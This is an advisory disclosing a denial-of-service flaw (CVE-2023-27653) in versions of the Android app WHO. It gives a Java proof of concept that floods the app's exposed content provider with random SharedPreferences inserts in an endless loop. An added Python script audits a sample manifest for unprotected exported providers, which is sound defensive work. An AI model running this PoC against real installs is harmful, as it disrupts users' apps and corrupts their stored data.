Denial of Service exists in WHO (CVE-2023-27653)
Vendor: WHO (https://www.whoapp.live/)
Affected product: Who (com.scorp.who)
Version: 1.0.28, 1.0.30, 1.0.32
Download link: https://play.google.com/store/apps/details?id=com.scorp.who
Description of the vulnerability for use in the CVE: An issue found in WHO v.1.0.28, v.1.0.30, v.1.0.32 allows an attacker to cause a denial of service via the SharedPreference files.
PoC:
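// Method of an Android component (Activity or Service) in a separate app.
// getRandomString(int) is a helper that is not shown on this page.
public void attack() {
    ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
    String randomString = getRandomString(512);
    // The provider URI names the app's SharedPreferences file via sp_file_name.
    Uri uri = Uri.parse("content://com.scorp.who.TTMultiProvider/t_sp/contain/" + "zztest" + "?sp_file_name=com.scorp.who_preferences");
    // Calls insert() on the provider in an endless loop.
    while (true) {
        ContentValues contentValues = new ContentValues();
        contentValues.put(randomString, randomString);
        contentResolver.insert(uri, contentValues);
    }
}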
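
A defender-side check related to the PoC above, added here as an example; it is not part of the original advisory or the vendor's code. It lists content providers in a decoded AndroidManifest.xml that other apps can read or write without holding a permission. That the affected provider is exposed this way is an assumption drawn from the PoC calling it from another app; the manifest and all com.example names are constructed.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample manifest (not taken from any real app).
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.app">
  <application>
    <provider android:name="com.example.sdk.PrefsProvider"
              android:authorities="com.example.app.PrefsProvider"
              android:exported="true" />
    <provider android:name="com.example.app.GuardedProvider"
              android:authorities="com.example.app.guarded"
              android:exported="true"
              android:writePermission="com.example.app.permission.WRITE" />
    <provider android:name="com.example.app.InternalProvider"
              android:authorities="com.example.app.internal"
              android:exported="false" />
  </application>
</manifest>
"""

def _attr(elem, name):
    # Read an android:-namespaced attribute, or None if it is absent.
    return elem.get("{%s}%s" % (ANDROID_NS, name))

def audit_providers(manifest_xml):
    """Return exported providers that other apps can read or write without a permission."""
    findings = []
    for app in ET.fromstring(manifest_xml).iter("application"):
        app_perm = _attr(app, "permission")  # default for components without their own
        for prov in app.iter("provider"):
            # A missing android:exported is treated as false (the default from API 17).
            if _attr(prov, "exported") != "true":
                continue
            base = _attr(prov, "permission") or app_perm
            unguarded_read = not (_attr(prov, "readPermission") or base)
            unguarded_write = not (_attr(prov, "writePermission") or base)
            if unguarded_read or unguarded_write:
                findings.append({
                    "name": _attr(prov, "name"),
                    "authorities": _attr(prov, "authorities"),
                    "unguarded_read": unguarded_read,
                    "unguarded_write": unguarded_write,
                })
    return findings

if __name__ == "__main__":
    print(audit_providers(SAMPLE_MANIFEST))
```

For the issue described here, `unguarded_write` is the relevant flag, since the PoC reaches the preferences file through `insert()`.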